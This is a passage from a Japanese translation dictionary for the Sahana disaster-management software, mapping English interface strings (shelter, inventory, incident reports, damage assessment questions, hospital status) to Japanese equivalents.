'Freezing Drizzle': '凍結霧雨',
'Freezing Rain': 'みぞれ',
'Freezing Spray': '冷却スプレー',
'French': 'フランス語',
'Friday': '金曜日',
'From Inventory': '送付元',
'From Location': '送付元ロケーション',
'From Organization': '送付元団体',
'From Person': '送付元の担当者',
'From Warehouse': '倉庫から',
'From': '輸送元',
'Frost': '凍結',
'Fulfil. Status': '確保量は十分か',
'Fulfillment Status': '充足状況',
'Full beard': 'もみあげまでのアゴヒゲ、口髭あり',
'Full': '満員',
'Fullscreen Map': 'フルスクリーン表示',
'Function Permissions': '機能に対する権限',
'Function': '機能',
'Functional Tests': '機能テスト',
'Functions available': '利用可能な機能',
'Funding Organization': '資金提供団体',
'Funeral': '葬儀',
'Further Action Recommended': '更なる対応が推奨されている',
'GIS Reports of Shelter': '避難所のGISレポート',
'GIS integration to view location details of the Shelter': '避難所のロケーション詳細を閲覧するGISインテグレーション',
'GPS Marker': 'GPSマーカー',
'GPS Track File': 'GPS Track ファイル',
'GPS Track': 'GPS トラック',
'GPX Layers': 'GPX レイヤ',
'GPX Track': 'GPX形式の追跡情報',
'GRN Status': 'GRNステータス',
'Gale Wind': '強風',
'Gantt Chart': 'ガントチャート',
'Gap Analysis Map': 'ギャップ解析マップ',
'Gap Analysis Report': 'ギャップ解析報告',
'Gap Analysis': 'ギャップ解析',
'Gap Map': '需給ギャップマップ',
'Gap Report': '需給ギャップの報告',
'Gateway Settings': 'ゲートウェイ設定',
'Gateway settings updated': 'ゲートウェイ設定を更新しました',
'Gender': '性別',
'General Comment': '包括コメント',
'General Medical/Surgical': '一般医学/外科',
'General emergency and public safety': '一般的緊急事態と公共の安全',
'General information on demographics': '人口統計の情報',
'Generator': '発電機',
'Geocoder Selection': 'Geocoder 選択',
'Geometry Name': 'Geometry名',
'Geonames.org search requires Internet connectivity!': 'Geonames.org の検索を行うには、インターネットに接続している必要があります。',
'Geophysical (inc. landslide)': '地球物理 (地滑りを含む)',
'Geotechnical Hazards': '地盤災害',
'Geotechnical': '地質工学',
'Geraldo module not available within the running Python - this needs installing for PDF output!': '実行中のPythonでGeraldoモジュールが利用できません。PDF出力に必要です。',
'Geraldo not installed': 'Geraldoがインストールされていません',
'Get incoming recovery requests as RSS feed': '遺体回収要請をRSSフィードとして取得する',
'Girls 13-18 yrs in affected area': '影響地域内の13-18歳の女子数',
'Girls 13-18 yrs not attending school': '学校に来ていなかった13-18歳の女子数',
'Girls 6-12 yrs in affected area': '影響地域内の6-12歳の女子数',
'Girls 6-12 yrs not attending school': '学校に来ていなかった6-12歳の女子数',
'Give a brief description of the image, e.g. what can be seen where on the picture (optional).': '画像に関する説明。特に、写真のどの箇所に何が確認できるかを記載します (オプション)',
'Give information about where and when you have seen the person': '人物を見かけた場所や時間の情報を提供してください',
'Give information about where and when you have seen them': 'どこで、いつ、彼らを見かけたのか、情報をください',
'Global Messaging Settings': 'メッセージの全般設定',
'Glossary': '用語集',
'Go to Request': '支援要請に行く',
'Goatee': 'やぎヒゲ',
'Goods Received Note': '受諾した物資の注釈',
'Government UID': '政府UID',
'Government building': '政府所管の建物',
'Government': '政府・行政機関',
'Grade': '学年',
'Greek': 'ギリシャ語',
'Green': '緑',
'Ground movement, fissures': '地盤移動、亀裂',
'Ground movement, settlement, slips': '地盤移動、沈下、がけ崩れ',
'Group %(group_id)s created': 'グループ %(group_id)s を作成しました',
'Group Description': 'グループの説明',
'Group Details': 'グループの詳細',
'Group ID': 'グループID',
'Group Member added': 'グループメンバを追加しました',
'Group Members': 'グループメンバ',
'Group Memberships': 'グループメンバシップ',
'Group Name': 'グループ名',
'Group Title': 'グループのタイトル',
'Group Type': 'グループのタイプ',
'Group added': 'グループを追加しました',
'Group deleted': 'グループを削除しました',
'Group description': 'グループの説明',
'Group name': 'グループ名',
'Group type': 'グループタイプ',
'Group updated': 'グループを更新しました',
'Group': 'グループ',
'Groups removed': 'グループを削除しました',
'Groups': 'グループ',
'Guest': 'ゲスト',
'HR Data': '人的資源の情報',
'HR Manager': '人的資源マネージャー',
'Hail': 'あられ',
'Hair Color': '頭髪の色',
'Hair Length': '頭髪の長さ',
'Hair Style': 'ヘアスタイル',
'Has additional rights to modify records relating to this Organization or Site.': 'この団体やサイトに関連するレコードを変更するための権限を追加します',
'Has data from this Reference Document been entered into Sahana?': 'リファレンス文書の内容が Sahanaに登録してあるかどうかを記載してください。',
'Has only read-only access to records relating to this Organization or Site.': 'この団体やサイトに関連するレコードを閲覧のみに制限します',
'Has the safety and security of women and children in your community changed since the emergency?': '緊急事態以来、女性や未成年の生活の危険度が変化したかどうかを記載してください',
'Has your business been damaged in the course of the disaster?': '災害の過程で、ビジネス上の損害を受けているかどうかを記載してください',
'Have households received any shelter/NFI assistance or is assistance expected in the coming days?': '世帯に対して避難所用品や生活必需品が配布されている、あるいは数日以内に配布を実施できるかを記載してください',
'Have normal food sources been disrupted?': '平常時の食料調達源が利用不可能になったかどうかを記載してください',
'Have schools received or are expecting to receive any assistance?': '学校に対してなんらかの支援が行われた、あるいは行われる予定であるかどうかを記載してください',
'Have the people received or are you expecting any medical or food assistance in the coming days?': '医療品や食糧支援を、被災者、あるいはあなたが受領したかどうか、あるいは数日以内に受領できそうかどうかを記載してください。',
'Hazard Pay': '災害補償金',
'Hazardous Material': '危険物',
'Hazardous Road Conditions': '災害発生後の道路状況',
'Header Background': 'ヘッダー背景',
'Header background file %s missing!': 'ヘッダー背景ファイル%sが存在しません。',
'Headquarters': '本部・本社',
'Health care assistance, Rank': '医療 / 介護支援、ランク',
'Health center with beds': '保健所(ベッドあり)',
'Health center without beds': '保健所(ベッドなし)',
'Health center': '保健所',
'Health services functioning prior to disaster': '災害発生以前 ヘルスサービスの提供',
'Health services functioning since disaster': '災害発生後 ヘルスサービスの提供',
'Health services status': '医療サービス状況',
'Health': '保険・介護',
'Healthcare Worker': 'ヘルスケア要員',
'Heat Wave': '熱波',
'Heat and Humidity': '熱と湿度',
'Height (cm)': '身長 (cm)',
'Height': '身長',
'Help': ' ヘルプ ',
'Helps to monitor status of hospitals': '病院の現状把握に役立つ情報を管理します',
'Helps to report and search for Missing Persons': '行方不明者の報告と検索を支援します。',
'Here are the solution items related to the problem.': '問題に関連する解決案です。',
'Heritage Listed': '遺産登録',
'Hide Details': '詳細を隠す',
'Hierarchy Level 0 Name (e.g. Country)': '階層レベル0の名前(例: 国)',
'Hierarchy Level 1 Name (e.g. Province)': '階層レベル1の名前 (例: 都道府県)',
'Hierarchy Level 2 Name': 'ロケーション階層レベル2の名前',
'Hierarchy Level 3 Name': '階層レベル3の名前',
'Hierarchy Level 4 Name': '階層レベル4の名前',
'High Water': '最高水位',
'High': '高',
'Hindu': 'ヒンズー教徒',
'History': '履歴',
'Hit the back button on your browser to try again.': 'ブラウザの「戻る」ボタンを押して、やり直してください。',
'Holiday Address': '休日の住所',
'Home Address': '自宅住所',
'Home Country': '所属国',
'Home Crime': '住居犯罪',
'Home': 'ホーム',
'Hospital Details': '病院の詳細',
'Hospital Status Report': '病院ステータスレポート',
'Hospital information added': '病院情報を追加しました',
'Hospital information deleted': '病院情報を削除しました',
'Hospital information updated': '病院情報を更新しました',
'Hospital status assessment.': '病院ステータスアセスメント',
'Hospital': '病院',
'Hospitals': '病院情報',
'Hot Spot': 'ホットスポット',
'Hour': '時間',
'Hourly': '1時間毎',
'Household kits received': '家事用品を受領しました',
'Household kits, source': '家事用品の送付元',
'How did boys 13-17yrs spend most of their time prior to the disaster?': '災害発生前、13-17歳の男子がよく集まっていた場所と活動は?',
'How did boys <12yrs spend most of their time prior to the disaster?': '災害発生前、12歳以下の男子がよく集まっていた場所と活動は?',
'How did boys girls 13-17yrs spend most of their time prior to the disaster?': '災害発生前、13-17歳の女子がよく集まっていた場所と活動は?',
'How did girls <12yrs spend most of their time prior to the disaster?': '災害発生前、12歳以下の女子がよく集まっていた場所と活動は?',
'How do boys 13-17yrs spend most of their time now?': '現在、13-17歳の男子は普段何をして過ごしていますか?',
'How do boys <12yrs spend most of their time now?': '現在、12歳以下の男子は普段何をして過ごしていますか?',
'How do girls 13-17yrs spend most of their time now?': '現在、13-17歳の女子は普段何をして過ごしていますか?',
'How do girls <12yrs spend most of their time now?': '現在、12歳以下の女子は普段何をして過ごしていますか?',
'How does it work?': 'どのように動きますか?',
'How is this person affected by the disaster? (Select all that apply)': 'この人物の被災状況を記載してください(該当する項目を全て選択)',
'How long does it take you to reach the available water resources? Specify the time required to go there and back, including queuing time, by foot.': '水資源を確保できる地点までの距離を記載します。徒歩で往復し、待ち時間も含めた時間を記載してください。',
'How long does it take you to walk to the health service?': '医療サービスが提供されている場所まで、徒歩で必要な時間を記載します。',
'How long will the food last?': '洪水の残存予測期間',
'How long will this water resource last?': '水の供給が枯渇する時期',
'How many Boys (0-17 yrs) are Dead due to the crisis': '災害で死亡した少年の数(0-17歳)',
'How many Boys (0-17 yrs) are Injured due to the crisis': '災害で負傷した少年の数(0-17歳)',
'How many Boys (0-17 yrs) are Missing due to the crisis': '災害で行方不明となった少年の数(0-17歳)',
'How many Girls (0-17 yrs) are Dead due to the crisis': '災害で死亡した少女の数(0-17歳)',
'How many Girls (0-17 yrs) are Injured due to the crisis': '災害で負傷した少女の数(0-17歳)',
'How many Girls (0-17 yrs) are Missing due to the crisis': '災害で行方不明になった少女の数(0-17歳)',
'How many Men (18 yrs+) are Dead due to the crisis': '災害で死亡した男性の数(18歳以上)',
'How many Men (18 yrs+) are Injured due to the crisis': '災害で負傷した男性の数(18歳以上)',
'How many Men (18 yrs+) are Missing due to the crisis': '災害で行方不明となった男性の数(18歳以上)',
'How many Women (18 yrs+) are Dead due to the crisis': '災害で死亡した女性の数(18歳以上)',
'How many Women (18 yrs+) are Injured due to the crisis': '災害で負傷した女性の数(18歳以上)',
'How many Women (18 yrs+) are Missing due to the crisis': '災害で行方不明となった女性の数(18歳以上)',
'How many days will the supplies last?': '支援物資がなくなるまでの日数',
'How many doctors in the health centers are still actively working?': 'ヘルスセンター内の医師の人数を記載してください',
'How many houses are uninhabitable (uninhabitable = foundation and structure destroyed)?': '居住不可になった家屋数を記載してください(居住不可 = 基礎構造や土台部分の破壊など)',
'How many houses suffered damage but remain usable (usable = windows broken, cracks in walls, roof slightly damaged)?': '災害によって破損したが、まだ利用が可能である住居の数を記載してください(利用可能 = 窓の破壊、壁のヒビ、屋根の軽微な破損など)',
'How many latrines are available in the village/IDP centre/Camp?': '村落/IDPセンター/仮泊施設内で利用可能なトイレの数を記載してください',
'How many midwives in the health centers are still actively working?': '医療センター内の助産師の人数を記載してください',
'How many new cases have been admitted to this facility in the past 24h?': '過去24時間でこの施設で受け入れたケースの数は?',
'How many nurses in the health centers are still actively working?': '保健所で活動可能な看護師は何人居ますか?',
'How many of the patients with the disease died in the past 24h at this facility?': 'この施設で過去24時間で何人の患者がこの病気で亡くなりましたか?',
'How many of the primary school age boys (6-12) in the area are not attending school?': 'この地域の、登校していない学童期男児(6-12歳)の数を記載してください。',
'How many of the primary school age girls (6-12) in the area are not attending school?': 'この地域の、登校していない学童期女児(6-12歳)の数を記載してください。',
'How many of the primary/secondary schools are now open and running a regular schedule of class?': '平常通りの授業を実施できている小学校・中学校・高校の数を記入してください',
'How many of the secondary school age boys (13-18) in the area are not attending school?': 'この地域の、登校していない中高校生年齢男子(13-18歳)の数を記載してください。',
'How many of the secondary school age girls (13-18) in the area are not attending school?': 'この地域の、登校していない女子中高生(13-18歳)の数を記載してください。',
'How many patients with the disease are currently hospitalized at this facility?': 'この病気のためにこの施設に入院している患者は現在何人ですか?',
'How many primary school age boys (6-12) are in the affected area?': '被災地域内の学童期男児(6-12歳)の数を記載してください',
'How many primary school age girls (6-12) are in the affected area?': '被災地域内の学童期女児(6-12歳)の数を記載してください。',
'How many primary/secondary schools were opening prior to the disaster?': '災害発生前に授業が行われていた小学校・中学校・高校の数を記載してください',
'How many secondary school age boys (13-18) are in the affected area?': '被災地域内の男子中学生・男子高校生(13-18歳)の数を記載してください',
'How many secondary school age girls (13-18) are in the affected area?': '被災地域内の中高生年齢女子(13-18歳)の数を記載してください。',
'How many teachers have been affected by the disaster (affected = unable to work)?': '被災し、授業ができない状態の教師の人数を記載してください',
'How many teachers worked in the schools prior to the disaster?': '災害発生前の教師の人数を記載してください',
'How much detail is seen. A high Zoom level means lot of detail, but not a wide area. A low Zoom level means seeing a wide area, but not a high level of detail.': 'どの程度詳細な情報が表示されるかを定義します。ズームすることで詳細が表示されるようになりますが、そのかわり、広域を見渡すことができなくなります。逆に、ズームしないことで広域を表示できますが、詳細情報の確認は行えなくなります。',
'Human Resource Management': '人的資源マネージメント',
'Human Resource': '人的資源',
'Human Resources Management': '人的資源管理',
'Human Resources': '人的資源',
'Humanitarian NGO': '人道支援NGO',
'Hurricane Force Wind': 'ハリケーンの風力',
'Hurricane': 'ハリケーン',
'Hygiene NFIs': '衛生用品',
'Hygiene kits received': '衛生用品を受領した',
'Hygiene kits, source': '衛生用品の送付元',
'Hygiene practice': '衛生習慣',
'Hygiene problems': '衛生上の問題',
'Hygiene': '衛生',
'I am available in the following area(s)': '以下の地域を担当できます',
'ID Label': 'IDラベル',
'ID Label: ': 'IDラベル: ',
'ID Tag Number': 'IDタグ番号',
'ID Tag': 'ID タグ',
'ID type': 'IDタイプ',
'Ice Pressure': '氷結圧力',
'Iceberg': 'アイスバーグ',
'Ideally a full URL to the source file, otherwise just a note on where data came from.': 'できればソースファイルの完全なURLを記載します。難しい場合はデータ入手元のメモでも構いません。',
'Identification Report': 'IDレポート',
'Identification Reports': 'IDレポート',
'Identification Status': 'IDステータス',
'Identification label of the Storage bin.': '備蓄コンテナの区別用ラベル番号。',
'Identification': 'ID',
'Identified as': '判明した身元',
'Identified by': 'によって識別された',
'Identity Details': '身元確認の詳細',
'Identity added': '身元情報を追加しました',
'Identity deleted': '身元確認を削除しました',
'Identity updated': '身元確認を更新しました',
'Identity': '身元確認',
'If Staff have login accounts then they are given access to edit the details of the': 'スタッフがログイン用アカウントを有している場合、以下項目の詳細を編集することができます:',
'If Unit = m, Base Unit = Km, then multiplicator is 0.0001 since 1m = 0.001 km.': '「Unit = m, Base Unit = Km」の場合、「1m = 0.001 km」なので乗数は0.0001 です。',
'If a user verifies that they own an Email Address with this domain, the Approver field is used to determine whether & by whom further approval is required.': 'このドメインの電子メールアドレスを所有するユーザーを認証する場合は、承認がさらに必要かどうか、必要なら誰が承認するか、を決めるのに承認者フィールドを使用します。',
'If enabled then a log is maintained of all records a user accesses. If disabled then it can still be enabled on a per-module basis.': '有効にすると、ユーザーがアクセスしたときに、全てのレコードがログに保存されます。無効にすると、モジュール毎に有効にすることができます。',
'If enabled then a log is maintained of all records a user edits. If disabled then it can still be enabled on a per-module basis.': '有効にすると、ユーザーが編集したすべてのレコードを記録します。無効にすると、モジュール毎に有効にできます。',
'If neither are defined, then the Default Marker is used.': 'もし両方共定義されていない場合、デフォルトマーカーが使われます。',
'If no marker defined then the system default marker is used': 'マーカーが定義されていない場合は、システムのデフォルトマーカーを使用します。',
'If no, specify why': 'いいえ、の場合はその理由を記載してください',
'If none are selected, then all are searched.': 'もしなにも選択しなければ、全てを検索します',
'If the location is a geographic area, then state at what level here.': '場所が地理的に確定できる場所ならば、その場所のレベルを記載してくだい。',
'If the request is for type "Other", you should enter a summary of the request here.': '支援要請が"その他"の場合、概要をここに入力する必要があります',
'If this field is populated then a user with the Domain specified will automatically be assigned as a Staff of this Organization': 'この項目が設定されている場合、ユーザーは、登録の際、この団体のスタッフとして登録されるように指定することができます',
'If this is set to True then mails will be deleted from the server after downloading.': 'Trueに設定されている場合は、メールはダウンロード後にサーバーから削除されます。',
'If this record should be restricted then select which role is required to access the record here.': 'このレコードへのアクセスを制限する際には、アクセスに必要となる権限を選択してください',
'If this record should be restricted then select which role(s) are permitted to access the record here.': 'このレコードを制限したい場合、アクセスを許可する権限を指定してください。',
'If yes, specify what and by whom': '「はい」の場合、供給される食料と供給元',
'If yes, which and how': '「はい」の場合、混乱している場所や原因を記載',
'If you do not enter a Reference Document, your email will be displayed to allow this data to be verified.': '参照文書を入力しない場合は、データ検証のために入力者の電子メールが表示されます。',
'If you know what the Geonames ID of this location is then you can enter it here.': 'このロケーションの Geonames ID がある場合、ここに入力してください。',
'If you know what the OSM ID of this location is then you can enter it here.': 'このロケーションの OSM ID がある場合、ここに入力してください。',
'If you need to add a new document then you can click here to attach one.': '文書の添付はこのページから可能です。',
'If you want several values, then separate with': '複数の値を入力したい場合、この文字で分割してください : ',
'If you would like to help, then please': 'ご協力いただける方は登録をお願いします',
'Illegal Immigrant': '不法移民',
'Image Details': '画像の詳細',
'Image Tags': '画像のタグ',
'Image Type': '画像のタイプ',
'Image Upload': '画像のアップロード',
'Image added': '画像を追加しました',
'Image deleted': '画像を削除しました',
'Image updated': '画像を更新しました',
'Image': '画像',
'Image/Attachment': '画像/添付資料',
'Image/Other Attachment': '画像/その他の添付ファイル',
'Imagery': '画像',
'Images': '画像',
'Immediate reconstruction assistance, Rank': '建築物の緊急修理 / 再建築支援、ランク',
'Impact Assessment Summaries': '災害影響範囲アセスメントの概要',
'Impact Assessments': '災害影響範囲アセスメント',
'Impact Baselines': '影響範囲の基準値',
'Impact Details': '被害の詳細',
'Impact Type Details': '災害影響のタイプ詳細',
'Impact Type added': '災害の影響タイプを追加しました',
'Impact Type deleted': '影響範囲タイプを削除しました',
'Impact Type updated': '災害影響のタイプを更新しました',
'Impact Type': '災害影響タイプ',
'Impact Types': '災害影響のタイプ',
'Impact added': '被災影響を追加しました',
'Impact deleted': '影響範囲を削除しました',
'Impact updated': '被災状況を更新しました',
'Impacts': '影響',
'Import & Export Data': 'データのインポートとエクスポート',
'Import Data': 'データのインポート',
'Import Job': 'Jobのインポート',
'Import Jobs': 'Jobsのインポート',
'Import and Export': 'インポートとエクスポート',
'Import from Ushahidi Instance': 'Ushahidi インスタンスから設定をインポート',
'Import if Master': 'マスターなら取り込む',
'Import job created': 'Import jobを作成しました',
'Import multiple tables as CSV': '複数のテーブルをCSVとしてインポート',
'Import': 'インポート',
'Import/Export': 'インポート/エクスポート',
'Important': '重要',
'Importantly where there are no aid services being provided': '救護サービスが提供されていない地域において重要となります',
'Imported': 'インポートしました',
'Importing data from spreadsheets': 'スプレッドシートからデータをインポートしています',
'Improper decontamination': '不適切な汚染の除去',
'Improper handling of dead bodies': '誤った扱いをされている遺体',
'In GeoServer, this is the Layer Name. Within the WFS getCapabilities, this is the FeatureType Name part after the colon(:).': 'In GeoServerでは、これはレイヤ名です。WFS getCapabilitiesでは、これはコロン(:)後のFeatureType名の部分です。',
'In GeoServer, this is the Workspace Name. Within the WFS getCapabilities, this is the FeatureType Name part before the colon(:).': 'GeoServer では、これはワークスペース名です。WFS getCapabilities では、これはコロン「:」の前の FeatureType の部分となります。',
'In Inventories': 'この物資の在処',
'In Process': '実行中',
'In Progress': '実行中',
'In Transit': '輸送中',
'In Window layout the map maximises to fill the window, so no need to set a large value here.': 'この地図のウィンドウレイアウトは、全体を覆い隠します。従って、ここで大きな値を入力する必要はありません',
'In general, what are the greatest needs of older people, people with disabilities, children, youth and women in your community?': '一般的に、コミュニティ内の高齢者、障がい者、子供、青年、女性たちが最も必要としている物資やサービスがなんであるかを記載してください',
'Inbound Mail Settings': '着信メール設定',
'Inbox': '受信箱',
'Incident Categories': 'インシデントカテゴリ',
'Incident Details': 'インシデントの詳細',
'Incident Report Details': 'インシデントレポートの詳細',
'Incident Report added': '災害影響範囲レポートを追加しました',
'Incident Report deleted': 'インシデントレポートを削除しました',
'Incident Report updated': 'インシデントレポートを更新しました',
'Incident Report': 'インシデントレポート',
'Incident Reporting System': 'インシデントの報告を行ないます',
'Incident Reporting': 'インシデントレポート',
'Incident Reports': 'インシデントレポート',
'Incident added': 'インシデントを追加しました',
'Incident deleted': 'インシデントを削除しました',
'Incident updated': 'インシデントを更新しました',
'Incident': 'インシデント',
'Incidents': 'インシデント',
'Incoming Shipment canceled': '到着する配送が取消しされました',
'Incoming Shipment updated': '入荷した物資が更新されました',
'Incoming': '入荷',
'Incomplete': '未完了',
'Individuals': '個人',
'Industrial Crime': '産業犯罪',
'Industrial': '産業',
'Industry Fire': '工場から出火',
'Industry close to village/camp': '村落/仮泊施設の周辺に工場が存在',
'Infant (0-1)': '乳児(0-1歳)',
'Infectious Disease': '感染症',
'Infectious Diseases': '感染症',
'Infestation': '感染',
'Informal Leader': '非公式なリーダー',
'Informal camp': '非指定避難所',
'Information gaps': '情報のギャップ',
'Infusion catheters available': '注入カテーテルが利用可能',
'Infusion catheters need per 24h': '24時間毎に必要な注入カテーテル数',
'Infusion catheters needed per 24h': '24時間ごとに、注入カテーテルが必要',
'Infusions available': '点滴が利用可能',
'Infusions needed per 24h': '24時間毎に必要な点滴の数',
'Input Job': 'Jobのインポート',
'Inspected': '調査済み',
'Inspection Date': '調査した日付',
'Inspection date and time': '調査日時',
'Inspection time': '調査した時刻',
'Inspector ID': '調査者ID',
'Instance Type': 'インスタンスタイプ',
'Instant Porridge': 'インスタント粥',
'Institution': 'その他の組織',
'Insufficient Privileges': '権限が足りません',
'Insufficient vars: Need module, resource, jresource, instance': '不十分な変数: module, resource, jresource, instance が必要です',
'Insufficient': '不足',
'Intake Items': 'アイテムの受け入れ',
'Intergovernmental Organization': '国際政府間組織',
'Interior walls, partitions': '室内の壁、仕切り',
'Internal Features': '内部機能',
'Internal State': '内部状態',
'International NGO': '国際NGO',
'International Organization': '国際機関',
'International Staff': '国外からのスタッフ',
'Intervention': '介入',
'Interview taking place at': 'インタビュー実施場所',
'Invalid Query': '無効なクエリ',
'Invalid email': '無効な電子メール',
'Invalid login': '無効なログイン',
'Invalid request!': 'リクエストは無効です。',
'Invalid ticket': '無効なチケット',
'Invalid': '無効な',
'Inventories with Item': '在庫アイテム',
'Inventories': '在庫管理',
'Inventory Item Details': '救援物資の在庫詳細',
'Inventory Item added': '救援物資の在庫を追加しました',
'Inventory Item deleted': '備蓄物資を削除しました',
'Inventory Item updated': '備蓄物資を更新しました',
'Inventory Item': '備蓄物資',
'Inventory Items Available for Request Item': '要求された物資に適合する、倉庫内の物資',
'Inventory Items': '備蓄物資',
'Inventory Management': '物資の管理',
'Inventory Store Details': '物資集積地点の詳細',
'Inventory Store added': '物資集積地点を追加しました',
'Inventory Store deleted': '物資集積地点を削除しました',
'Inventory Store updated': '物資集積地点を更新しました',
'Inventory Store': '物資集積地点',
'Inventory Stores': '物資集積地点',
'Inventory functionality is available for:': '備蓄機能を利用可能:',
'Inventory of Effects': '救援物資の影響',
'Inventory': '在庫',
'Inventory/Ledger': '在庫 / 元帳',
'Is adequate food and water available for these institutions?': '関係者に対して十分な水と食料が供給されていますか?',
'Is it safe to collect water?': '水の確保は安全に行えるか?',
'Is there any industrial or agro-chemical production close to the affected area/village?': '村落/集落の近くに、工場あるいは農業化学プラントなどが存在しますか?',
'Is this a strict hierarchy?': 'これは厳密な階層構造ですか?',
'Issuing Authority': '発行機関',
'It is built using the Template agreed by a group of NGOs working together as the': '聞き取り項目のテンプレートは、以下リンクのNGO組織と協同で作成されています。',
'Item Added to Shipment': '輸送情報に物資を追加する',
'Item Catalog Categories': '物資カタログカテゴリ',
'Item Catalog Category Details': '救援物資カタログのカテゴリ詳細',
'Item Catalog Category added': '救援物資カタログのカテゴリを追加しました',
'Item Catalog Category deleted': '救援物資カタログのカテゴリを削除しました',
'Item Catalog Category updated': '物資カタログカテゴリを更新しました',
'Item Catalog Category': '救援物資カタログのカテゴリ',
'Item Catalog Details': '物資カタログの詳細',
'Item Catalog added': '救援物資カタログを追加しました',
'Item Catalog deleted': '物資カタログを削除しました',
'Item Catalog updated': '物資カタログを更新しました',
'Item Catalogs': '救援物資カタログ',
'Item Categories': '物資カテゴリ',
'Item Category Details': '物資カテゴリの詳細',
'Item Category added': '救援物資カテゴリを追加しました',
'Item Category deleted': '救援物資カテゴリを削除しました',
'Item Category updated': '物資カテゴリを更新しました',
'Item Category': '物資カテゴリ',
'Item Details': '救援物資の詳細',
'Item Pack Details': '救援物資パックの詳細',
'Item Pack added': '物資パックを追加しました',
'Item Pack deleted': '救援物資のパックを削除しました',
'Item Pack updated': '救援物資パックを更新しました',
'Item Packs': '物資パック',
'Item Sub-Categories': '救援物資のサブカテゴリ',
'Item Sub-Category Details': '物資サブカテゴリの詳細',
'Item Sub-Category added': '救援物資のサブカテゴリを追加しました',
'Item Sub-Category deleted': '物資サブカテゴリを削除しました',
'Item Sub-Category updated': '救援物資サブカテゴリを更新しました',
'Item Sub-Category': '物資サブカテゴリ',
'Item added to shipment': '物資が輸送に回りました',
'Item added': '救援物資を追加しました',
'Item already in Bundle!': '物資がすでにバンドルに存在しています。',
'Item already in Kit!': '救援物資は既にキットに存在しています',
'Item already in budget!': '物資は既に予算に登録されています',
'Item deleted': '物資を削除しました',
'Item updated': '救援物資を更新しました',
'Item': '物資',
'Items': '救援物資',
'Japan': '日本',
'Japanese': '日本語',
'Jerry can': 'ジェリ缶',
'Jew': 'ユダヤ教徒',
'Job Market': '求人',
'Job Title': '肩書き',
'Jobs': '職業',
'Just Once': '一度だけ',
'KPIs': 'KPI',
'Key Details': 'Keyの詳細',
'Key added': 'キーを追加しました',
'Key deleted': 'キーを削除しました',
'Key updated': 'キーを更新しました',
'Key': 'キー',
'Keys': 'キー',
'Kit Contents': 'Kitの内容',
'Kit Details': 'Kitの詳細',
'Kit Updated': 'キットを更新しました',
'Kit added': 'キットを追加しました',
'Kit deleted': 'キットを削除しました',
'Kit updated': 'キットを更新しました',
'Kit': 'キット',
'Kits': 'キット',
'Known Identities': '既知のID',
'Known incidents of violence against women/girls': '女性に対する暴力行為が発生した',
'Known incidents of violence since disaster': '災害発生後に暴力行為が発生した',
'LICENSE': 'ライセンス',
'LMS Administration': 'LMSの管理',
'Label': 'ラベル',
'Lack of material': '資材不足',
'Lack of school uniform': '学校制服が不足',
'Lack of supplies at school': '学校用物資の不足',
'Lack of transport to school': '学校への輸送手段の不足',
'Lactating women': '授乳中の女性の数',
'Lahar': 'ラハール',
'Landslide': '地すべり',
'Language': 'Language 言語',
'Last Name': '名前',
'Last known location': '最後に目撃された場所',
'Last name': '名前',
'Last synchronization time': 'データ同期の最終実施時刻',
'Last updated': '最終更新日',
'Last updated by': '最終更新者',
'Last updated on': '直近のアップデート実施時刻',
'Latitude & Longitude': '緯度&経度',
'Latitude is North-South (Up-Down). Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere.': '緯度は南北方向(上下)を定義します。赤道ではゼロ、北半球ではプラス、南半球ではマイナスとなります。',
'Latitude is North-South (Up-Down).': '緯度は南北(上下)です',
'Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere.': '緯度は赤道では0、北半球ではプラス、南半球ではマイナスになります',
'Latitude should be between': '緯度の値として有効な値は',
'Latitude': '緯度',
'Latrines': 'トイレ',
'Law enforcement, military, homeland and local/private security': '法執行機関、自衛隊、警察および警備会社',
'Layer Details': 'レイヤの詳細',
'Layer added': 'レイヤを追加しました',
'Layer deleted': 'レイヤを削除しました',
'Layer updated': 'レイヤを更新しました',
'Layer': 'レイヤ',
'Layers updated': 'レイヤを更新しました',
'Layers': 'レイヤ',
'Layout': 'レイアウト',
'Legend Format': '凡例形式',
'Length': '長さ',
'Level 1 Assessment Details': 'レベル1アセスメントの詳細',
'Level 1 Assessment added': 'レベル1アセスメントを追加しました',
'Level 1 Assessment deleted': 'レベル1のアセスメントを削除しました',
'Level 1 Assessment updated': 'レベル1アセスメントを更新しました',
'Level 1 Assessments': 'レベル1 アセスメント',
'Level 1': 'レベル1',
'Level 2 Assessment Details': 'レベル2アセスメントの詳細',
'Level 2 Assessment added': 'レベル2アセスメントを追加しました',
'Level 2 Assessment deleted': 'レベル2アセスメントを削除しました',
'Level 2 Assessment updated': 'レベル2アセスメントを更新しました',
'Level 2 Assessments': 'レベル2アセスメント',
'Level 2 or detailed engineering evaluation recommended': 'レベル2あるいは詳細な技術的評価を行うことを推奨します',
'Level 2': 'レベル2',
'Level': 'レベル',
'Library support not available for OpenID': 'OpenIDのライブラリサポートが利用できません',
'License Plate': '個人認証カード',
'Line': '行',
'LineString': '折れ線',
'Link Item & Shipment': 'アイテムと輸送を紐付ける',
'Link an Item & Shipment': 'アイテムと出荷を結び付ける',
'Linked Records': '参照しているレコード',
'Linked records': '関連しているレコード',
'List / Add Baseline Types': '基準値タイプの一覧 / 追加',
'List / Add Impact Types': '災害影響のタイプを表示 / 追加',
'List / Add Services': 'サービスの一覧表示 / 追加',
'List / Add Types': 'タイプの一覧表示 / 追加',
'List Activities': '支援活動一覧',
'List Aid Requests': '援助要請の一覧',
'List All Entries': '全てのエントリ一覧',
'List All Memberships': '全てのメンバシップ一覧',
'List All Reports': '報告すべての一覧',
'List All': '全項目一覧',
'List Alternative Items': '代わりの物資一覧',
'List Assessment Summaries': 'アセスメント要約の一覧',
'List Assessments': 'アセスメント一覧',
'List Asset Assignments': '資産割り当ての一覧',
'List Assets': '資産一覧',
'List Baseline Types': '基準値タイプ一覧',
'List Baselines': '基準値一覧',
'List Brands': '銘柄の一覧',
'List Budgets': '予算の一覧',
'List Bundles': 'Bundleの一覧',
'List Catalog Items': '物資カタログの一覧',
'List Category<>Sub-Category<>Catalog Relation': 'Category<>Sub-Category<>Catalog 関係一覧',
'List Checklists': 'チェックリスト一覧',
'List Cluster Subsectors': 'クラスタのサブセクタ一覧',
'List Cluster': 'クラスタ一覧',
'List Clusters': 'クラスタ一覧',
'List Commitment Items': 'コミットされた救援物資の一覧',
'List Commitments': 'コミットメントの一覧',
'List Configs': '設定一覧',
'List Conflicts': 'データ競合一覧',
'List Contact Information': '連絡先情報の一覧',
